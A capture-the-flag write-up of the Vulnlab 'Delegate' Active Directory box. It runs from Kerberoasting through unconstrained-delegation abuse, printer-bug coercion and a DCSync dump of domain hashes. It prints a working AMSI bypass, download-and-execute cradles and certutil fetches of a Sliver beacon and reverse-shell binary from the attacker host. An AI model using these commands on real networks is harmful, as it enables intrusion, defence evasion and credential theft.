vulnlab-delegate

vulnlab delegate

Delegate is a Medium-rated AD machine about abusing the SeEnableDelegationPrivilege held by a compromised user: with it we create a machine account, mark it as trusted for unconstrained delegation, coerce the Domain Controller into authenticating to it, and dump the domain with the captured TGT.


┌──(puck㉿kali)[~/vulnhub/delegate]
└─$ impacket-lookupsid guest@delegate.vl 10000
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Brute forcing SIDs at delegate.vl
[*] StringBinding ncacn_np:delegate.vl[\pipe\lsarpc]
[*] Domain SID is: S-1521148447309334495286952030935120
498: DELEGATE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: DELEGATE\Administrator (SidTypeUser)

snip

1108: DELEGATE\N.Thompson (SidTypeUser)
1121: DELEGATE\delegation admins (SidTypeGroup)


┌──(puck㉿kali)[~/vulnhub/delegate]
└─$ impacket-GetNPUsers delegate.vl/puck -usersfile users.txt -dc-ip dc1.delegate.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[-] User A.Briggs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User b.Brown doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User R.Cooper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User J.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User N.Thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax


┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ smbclient //delegate.vl/SYSVOL -U puck
Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Sep 9 09:52:30 2023
.. D 0 Sat Aug 26 05:39:25 2023
delegate.vl Dr 0 Sat Aug 26 05:39:25 2023


5242879 blocks of size 4096. 1960185 blocks available
smb: \> cd delegate.vl\
smb: \delegate.vl\> ls
. D 0 Sat Aug 26 05:45:45 2023
.. D 0 Sat Aug 26 05:39:25 2023
DfsrPrivate DHSr 0 Sat Aug 26 05:45:45 2023
Policies D 0 Sat Aug 26 05:39:30 2023
scripts D 0 Sat Aug 26 08:45:24 2023


5242879 blocks of size 4096. 1960185 blocks available
smb: \delegate.vl\> cd scripts
smb: \delegate.vl\scripts\> ls
. D 0 Sat Aug 26 08:45:24 2023
.. D 0 Sat Aug 26 05:45:45 2023
users.bat A 159 Sat Aug 26 08:54:29 2023


5242879 blocks of size 4096. 1960182 blocks available
smb: \delegate.vl\scripts\> get users.bat
getting file \delegate.vl\scripts\users.bat of size 159 as users.bat (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \delegate.vl\scripts\>


┌──(puck㉿kali)[~/vulnhub/delegate]
└─$ cat users.bat
rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123

The logon script in SYSVOL, readable by any authenticated user, contains a hard-coded password. It is valid for A.Briggs, so we use it to collect BloodHound data and get more info:

┌──(puck㉿kali)[~/vulnhub/delegate]
└─$ bloodhound-python -d delegate.vl -c all -u 'A.Briggs' -p 'P4ssw0rd1#123' -ns 10.10.114.169

Upload data to Bloodhound, we find

The user A.BRIGGS@DELEGATE.VL has generic write access to the user N.THOMPSON@DELEGATE.VL.

Generic Write access grants you the ability to write to any non-protected attribute on the target object, including "members" for a group, and "serviceprincipalnames" for a user.

A targeted Kerberoast attack can be performed with targetedKerberoast.py: using the GenericWrite over N.Thompson, the tool adds an SPN to the account, requests a service ticket for that SPN, removes the SPN again, and prints the ticket in a crackable format. The password can then be cracked offline (RC4 tickets, etype 23, are the fast case).

targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'

The tool automatically runs the attack, either against every user the controlled account can write to or against the one specified on the command line, and outputs a crackable hash.

┌──(puck㉿kali)[~/vulnhub/delegate]
└─$ cd targetedKerberoast
┌──(puck㉿kali)[~/vulnhub/delegate/targetedKerberoast]
└─$ ls
kerberoastables.txt LICENSE README.md requirements.txt targetedKerberoast.py
┌──(puck㉿kali)[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 -m venv venv
┌──(puck㉿kali)[~/vulnhub/delegate/targetedKerberoast]
└─$ ls
kerberoastables.txt LICENSE README.md requirements.txt targetedKerberoast.py venv
┌──(puck㉿kali)[~/vulnhub/delegate/targetedKerberoast]
└─$ source venv/bin/activate
┌──(venv)(puck㉿kali)[~/vulnhub/delegate/targetedKerberoast]
└─$ pip3 install -r requirements.txt
Collecting ldap3 (from -r requirements.txt (line 1))
Using cached ldap3-2.9.1-py2.py3-none-any.whl.metadata (5.4 kB)
--snip--
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: six, pygments, pycryptodomex, pycryptodome, pycparser, pyasn1, mdurl, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, markdown-it-py, ldap3, Jinja2, cffi, rich, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 markdown-it-py-3.0.0 mdurl-0.1.2 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodome-3.20.0 pycryptodomex-3.20.0 pygments-2.18.0 rich-13.7.1 six-1.16.0
┌──(venv)(puck㉿kali)[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 targetedKerberoast.py -u 'A.Briggs' -p 'P4ssw0rd1#123' --request-user N.Thompson -d 'delegate.vl'
[*] Starting kerberoast attacks
[*] Attacking user (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$69b5ede798c5c49a1d7fa396a7746c96$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
┌──(venv)(puck㉿kali)[~/vulnhub/delegate/targetedKerberoast]
└─$

┌──(puck㉿kali)[~/vulnhub/delegate]
└─$ john -w:/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
KALEB_2341 (?)
1g 0:00:00:03 DONE (2024-06-10 12:40) 0.2695g/s 2966Kp/s 2966Kc/s 2966KC/s KANECHA1..KABYLS3427
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Privesc

We can log into the DC with evil-winrm as N.Thompson and enumerate the account's privileges (whoami /priv).

N.Thompson holds SeEnableDelegationPrivilege, the right to set the TRUSTED_FOR_DELEGATION flag on accounts. By default that right is granted only to Administrators on domain controllers, so a regular user having it is the misconfiguration this box is built around.

With it we can abuse unconstrained Kerberos delegation to take over the domain: we create a machine account we control, mark it as trusted for unconstrained delegation, and coerce the Domain Controller into authenticating to it. When a client authenticates with Kerberos to a host trusted for unconstrained delegation, its forwardable TGT is sent along inside the service ticket, so we receive a usable TGT for DC1$ and can DCSync with it. The krbrelayx toolkit provides the listener that extracts those TGTs from clients connecting to the attacker-controlled host.

First we check that we can add machine accounts at all: the MachineAccountQuota must be greater than zero (the default is 10). LDAP signing only matters for relay attacks and is not needed here, since the machine account is created with ordinary authenticated LDAP writes as N.Thompson.

┌──(puck㉿kali)[~/vulnhub/delegate]
└─$ crackmapexec ldap delegate.vl -u 'N.Thompson' -p 'KALEB_2341' -M maq
SMB dc1.delegate.vl 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
LDAP dc1.delegate.vl 389 DC1 [+] delegate.vl\N.Thompson:KALEB_2341
MAQ dc1.delegate.vl 389 DC1 [*] Getting the MachineAccountQuota
MAQ dc1.delegate.vl 389 DC1 MachineAccountQuota: 10

Next, we upload Powermad.ps1 to the machine and use it to create our attacker-controlled machine account, then set its userAccountControl attribute. We set it to 528384 (0x81000), which is WORKSTATION_TRUST_ACCOUNT (0x1000) plus TRUSTED_FOR_DELEGATION (0x80000), the flag that marks the account for unconstrained delegation. Writing TRUSTED_FOR_DELEGATION is exactly what SeEnableDelegationPrivilege permits, which is why this step has to run as N.Thompson.

Check whether AMSI is enabled: yes, importing PowerView is blocked.

*Evil-WinRM* PS C:\windows\tasks> Import-Module .\PowerView.ps1
This script contains malicious content and has been blocked by your antivirus software.

AMSI bypass

*Evil-WinRM* PS C:\windows\tasks> (new-object system.net.webclient).downloadstring("http://10.8.2.138:8000/AMSIBypassPatch.ps1")|iex
Protection Disabled

*Evil-WinRM* PS C:\windows\tasks> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\windows\tasks> Get-NetDomain

Forest                  : delegate.vl
DomainControllers       : {DC1.delegate.vl}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  :
PdcRoleOwner            : DC1.delegate.vl
RidRoleOwner            : DC1.delegate.vl
InfrastructureRoleOwner : DC1.delegate.vl
Name                    : delegate.vl

Using Powermad and the printer bug

┌──(puck㉿kali)[~/vulnhub/delegate]
└─$ evil-winrm -i DC1.delegate.vl -u N.Thompson -p KALEB_2341
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> upload Powermad.ps1
Info: Uploading /home/puck/vulnhub/delegate/Powermad.ps1 to C:\Users\N.Thompson\Documents\Powermad.ps1
Data: 180768 bytes of 180768 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount PWNED -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
[+] Machine account PWNED added
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute useraccountcontrol -Value 528384
[+] Machine account pwned attribute useraccountcontrol updated
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Value HTTP/PWNED.delegate.vl -Append
[+] Machine account pwned attribute ServicePrincipalName appended
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Get-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Verbose
Verbose: [+] Domain Controller = DC1.delegate.vl
Verbose: [+] Domain = delegate.vl
Verbose: [+] Distinguished Name = CN=pwned,CN=Computers,DC=delegate,DC=vl
HTTP/PWNED.delegate.vl
RestrictedKrbHost/PWNED
HOST/PWNED
RestrictedKrbHost/PWNED.delegate.vl
HOST/PWNED.delegate.vl
*Evil-WinRM* PS C:\Users\N.Thompson\Documents>

Optionally, drop a Sliver beacon on the host for a more stable foothold:

certutil.exe -urlcache -f http://10.8.2.138/powerpoint.exe power.exe [sliver beacon]

sliver > https --lport 8443

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile
==== ======= ========== ====== ==============
 1    https   tcp        8443

[*] Beacon 9bc2112c sitecar-3 - 10.10.134.198:50150 (ws01) - windows/amd64 - Wed, 20 Nov 2024 12:31:32 CET

sliver > use 9bc2112c-9bb3-44c5-a1fd-038fff83264e
[*] Active beacon sitecar-3 (9bc2112c-9bb3-44c5-a1fd-038fff83264e)

sliver (sitecar-3) >

Serve the scripts from a Python web server on the attacker host:

$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.248.86 - - [20/Nov/2024 10:41:55] "GET /AMSIBypassPatch.ps1 HTTP/1.1" 200 -
10.10.248.86 - - [20/Nov/2024 10:53:37] "GET /PowerView.ps1 HTTP/1.1" 200 -
10.10.248.86 - - [20/Nov/2024 11:11:54] "GET /amsi.txt HTTP/1.1" 200 -

From the beacon, run the AMSI bypass first, then load PowerView:

sliver (sitecar-3) > execute powershell.exe (new-object system.net.webclient).downloadstring("http://10.8.2.138:8000/AMSIBypassPatch.ps1")|iex
[*] Tasked beacon sitecar-3 (39a54d03)
[+] sitecar-3 completed task 39a54d03
[*] Command executed successfully
sliver (sitecar-3) >

The alternative one-liner in amsi.txt locates the AmsiUtils type by reflection, reads its amsiContext pointer and overwrites the first 32-bit word of the context with zero, so every subsequent AmsiScanBuffer call fails and scanning is skipped:

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

sliver (sitecar-3) > execute powershell.exe (new-object system.net.webclient).downloadstring("http://10.8.2.138:8000/amsi.txt")|iex
[*] Tasked beacon sitecar-3 (305d3b54)
[+] sitecar-3 completed task 305d3b54
[*] Command executed successfully

sliver (sitecar-3) > execute powershell.exe (new-object system.net.webclient).downloadstring("http://10.8.2.138:8000/PowerView.ps1")|iex
[*] Tasked beacon sitecar-3 (ef02a107)
[+] sitecar-3 completed task ef02a107
[*] Command executed successfully

certutil.exe -urlcache -f http://10.8.2.138:8000/rcat_10.8.2.138_443.exe rcat_10.8.2.138_443.exe

Alternatively, from the beacon we run execute-shellcode -i /payloads/UnmanagedPowerShell.bin and then add a DNS entry for our host with Powermad: New-ADIDNSNode -Tombstone -Verbose -Node kali.delegate.vl -Data 10.8.2.138

Check with the AMSI bypass and PowerView whether the delegation flag was actually set:

(new-object system.net.webclient).downloadstring("http://10.8.2.138:8000/AMSIBypassPatch.ps1")|iex

get-domaincomputer -unconstrained | select distinguishedname, useraccountcontrol

Without the bypass, PowerView is blocked:

*Evil-WinRM* PS C:\windows\tasks> (new-object system.net.webclient).downloadstring("http://10.8.2.138:8000/PowerView.ps1")|iex
At line:1 char:1
+ #requires -version 2
+ ~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:90
+ ... webclient).downloadstring("http://10.8.2.138:8000/PowerView.ps1")|iex
+                                                                       ~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
*Evil-WinRM* PS C:\windows\tasks> 

*Evil-WinRM* PS C:\windows\tasks> (new-object system.net.webclient).downloadstring("http://10.8.2.138:8000/AMSIBypassPatch.ps1")|iex
Protection Disabled
*Evil-WinRM* PS C:\windows\tasks> (new-object system.net.webclient).downloadstring("http://10.8.2.138:8000/PowerView.ps1")|iex
*Evil-WinRM* PS C:\windows\tasks> get-domaincomputer -unconstrained | select distinguishedname, useraccountcontrol

distinguishedname                                                             useraccountcontrol
-----------------                                                             ------------------
CN=DC1,OU=Domain Controllers,DC=delegate,DC=vl      SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
CN=PWNED,CN=Computers,DC=delegate,DC=vl        WORKSTATION_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION


*Evil-WinRM* PS C:\windows\tasks> 

Now we need the NT hash of the machine account password we set: krbrelayx takes it via -hashes and uses it to decrypt the service tickets the DC sends to PWNED$, which carry the forwarded TGT. Some simple Python does it, provided the local OpenSSL still exposes MD4 (on OpenSSL 3 builds without the legacy provider loaded, hashlib.new('md4') raises ValueError):

>>> import hashlib
>>> print(hashlib.new('md4', '12345'.encode('utf-16le')).hexdigest())
7a21990fcd3d759941e45c490f143d5f

Set up the krbrelayx listener with that hash; it waits for connections, and the DC1$ ticket shown below arrives once the coercion in the next step fires:

┌──(puck㉿kali)[~/vulnhub/delegate/krbrelayx]
└─$ python3 krbrelayx.py -hashes :7A21990FCD3D759941E45C490F143D5F
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.105.77
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.105.77
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.105.77
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'

Now trigger the printer bug. First add a DNS record so that PWNED.delegate.vl resolves to our attacker IP: the DC must reach our listener by that name and authenticate with Kerberos against the HOST/PWNED.delegate.vl SPN for its TGT to be forwarded (the NTLMSSP connections krbrelayx rejects above are the fallback we do not want). Then coerce DC1 to connect to it:

┌──(venv)(puck㉿kali)[~/vulnhub/delegate/krbrelayx]
└─$ python3 dnstool.py -u 'delegate.vl\pwned$' -p 12345 -r PWNED.delegate.vl -d 10.8.2.138 --action add -dns-ip 10.10.105.77 DC1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
┌──(venv)(puck㉿kali)[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py ‘DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache’ krbrelayx.py LICENSE printerbug.py venv
bloodyAD dnstool.py lib PetitPotam README.md
┌──(venv)(puck㉿kali)[~/vulnhub/delegate/krbrelayx]
└─$ python3 printerbug.py delegate.vl/'PWNED$'@dc1.delegate.vl PWNED.delegate.vl
[*] Impacket v0.11.0 - Copyright 2023 Fortra
Password:12345
[*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked
┌──(venv)(puck㉿kali)[~/vulnhub/delegate/krbrelayx]

The rpc_s_access_denied on the RPC reply is expected and does not mean the coercion failed; the captured DC1$ TGT in the listener output is the proof it worked. Point KRB5CCNAME at that ccache and use impacket-secretsdump with Kerberos authentication to DCSync the hashes:

┌──(puck㉿kali)[~/vulnhub/delegate/krbrelayx]
└─$ export KRB5CCNAME=$(pwd)/DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
┌──(puck㉿kali)[~/vulnhub/delegate/krbrelayx]
└─$ klist
Ticket cache: FILE:/home/puck/vulnhub/delegate/krbrelayx/DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
Default principal: DC1$@DELEGATE.VL
Valid starting Expires Service principal
06/12/2024 07:13:23 06/12/2024 17:07:36 krbtgt/DELEGATE.VL@DELEGATE.VL
renew until 06/19/2024 07:07:36
┌──(puck㉿kali)[~/vulnhub/delegate/krbrelayx]
└─$ impacket-secretsdump -k DC1.delegate.vl -just-dc-ntlm
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32<REDACTED>e93:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
A.Briggs:1104:aad3b435b51404eeaad3b435b51404ee:8e5a0462f96bc85faf20378e243bc4a3:::
b.Brown:1105:aad3b435b51404eeaad3b435b51404ee:deba71222554122c3634496a0af085a6:::
R.Cooper:1106:aad3b435b51404eeaad3b435b51404ee:17d5f7ab7fc61d80d1b9d156f815add1:::
J.Roberts:1107:aad3b435b51404eeaad3b435b51404ee:4ff255c7ff10d86b5b34b47adc62114f:::
N.Thompson:1108:aad3b435b51404eeaad3b435b51404ee:4b514595c7ad3e2f7bb70e7e61ec1afe:::
DC1$:1000:aad3b435b51404eeaad3b435b51404ee:6d93f6dbd8902d77f43e04bb1b1b5c6e:::
PWNED$:3101:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
[*] Cleaning up...

That's it! We created a machine account with unconstrained delegation, used it to capture the Domain Controller's Kerberos TGT, and used that ticket to authenticate as DC1$ and dump every password hash in the domain via DRSUAPI (DCSync).

After rooting the box, we verified that Defender was enabled (which is why the AMSI bypass was needed):

*Evil-WinRM* PS C:\windows\tasks> get-mpcomputerstatus
AMEngineVersion                  : 1.1.23080.2005
AMProductVersion                 : 4.18.23080.2006
AMRunningMode                    : Normal
AMServiceEnabled                 : True
AMServiceVersion                 : 4.18.23080.2006
AntispywareEnabled               : True
AntispywareSignatureAge          : 415
AntispywareSignatureLastUpdated  : 10/2/2023 5:06:19 AM

Resources

https://github.com/ShutdownRepo/targetedKerberoast
https://hashcat.net/wiki/doku.php?id=example_hashes
https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
https://github.com/Kevin-Robertson/Powermad
https://github.com/okankurtuluss/amsibypasspatch